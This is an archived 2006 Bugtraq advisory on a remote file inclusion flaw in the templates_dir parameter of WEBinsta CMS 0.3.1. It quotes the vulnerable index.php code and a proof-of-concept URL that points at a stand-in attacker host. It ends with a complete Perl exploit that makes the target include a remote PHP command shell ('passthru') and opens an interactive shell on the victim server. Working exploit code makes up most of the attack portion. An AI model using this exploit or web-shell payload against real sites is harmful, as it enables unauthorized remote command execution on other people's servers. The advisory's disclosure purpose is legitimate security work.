lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060814011352.27721.qmail@securityfocus.com>
Date: 14 Aug 2006 01:13:52 -0000
From: erdc@...o.or.id
To: bugtraq@...urityfocus.com
Subject: [ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File
 Inclusion Vulnerability

ECHO_ADV_45$2006

-----------------------------------------------------------------------------------------
[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------

Author        : M.Hasran Addahroni
Date           : Aug, 12th 2006
Location      : Australia, Sydney
Web           : http://advisories.echo.or.id/adv/adv45-K-159-2006.txt
Critical Lvl   : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WEBinsta CMS 
version      : 0.3.1
URL           : http://www.webinsta.com/ 
                  https://sourceforge.net/projects/webinsta/
                  http://atomo64.puffinhost.com/page/webinsta_cms.html
Description :

WEBinsta CMS provides a dynamic website building solution for small buisness and 
indivisuals who want to make their web presence felt. It provides a powerful 
system for people who doesn't know nothing about html or PHP.
Webinsta CMS is not longer supported by the Webinsta Team, now atomo64 
the only active developer and he's going to continue with it's development.
The new CMS name is InWeb CMS 

---------------------------------------------------------------------------

Proof of Concept:
~~~~~~~~~~~~~~~
Vulnerable Script: index.php .

---------------index.php--------------------------------
...
$tp_main=new bTemplate();
$tp_temp=new bTemplate();

include("code/processmods.php");
/*Read the block definition and the number*/
include($templates_dir."template.def.php");
/*administration panel and editing settings */
$show_edit=false;
...
------------------------------------------------------------------

Variables $templates_dir are not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can 
exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~~

http://www.target.com/[webinstacms_path]/index.php?templates_dir=http://attacker.com/evil?

Solution:
~~~~~~~~

use the latest version

Notification:
~~~~~~~~~~~

 vendor not contact yet

---------------------------------------------------------------------------
Shoutz:
~~~~~~
~ ping - my dearest wife, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit, x16
~ newbie_hacker@...oogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~

#!/usr/bin/perl
##
# WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Exploit
# Bug Found & code By K-159 
##
# echo.or.id (c) 2006
# 
##
# usage:
# perl WEBinsta.pl <target> <cmd shell location> <cmd shell variable>
#
# perl WEBinsta.pl http://target.com/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# #
#Greetz: My Dearest Wife - ping, 
#echo|staff (y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative),
#SinChan, sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16, mbahngarso, etc
# 
# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'index.php?templates_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[&#65533;&#402;.&#65533;&#8218;ª]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[&#65533;&#402;.&#65533;&#8218;ª]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print " *WEBinsta CMS 0.3.1 templates_dir Remote File Inclusion Exploit*\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl WEBinsta.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to WEBinsta CMS ex: http://www.site.com/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                           Bug Found by K-159 \r\n";
 print "                    www.echo.or.id #e-c-h-o irc.dal.net 2006 \r\n";
 print "============================================================================\r\n";
 exit();
 }

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ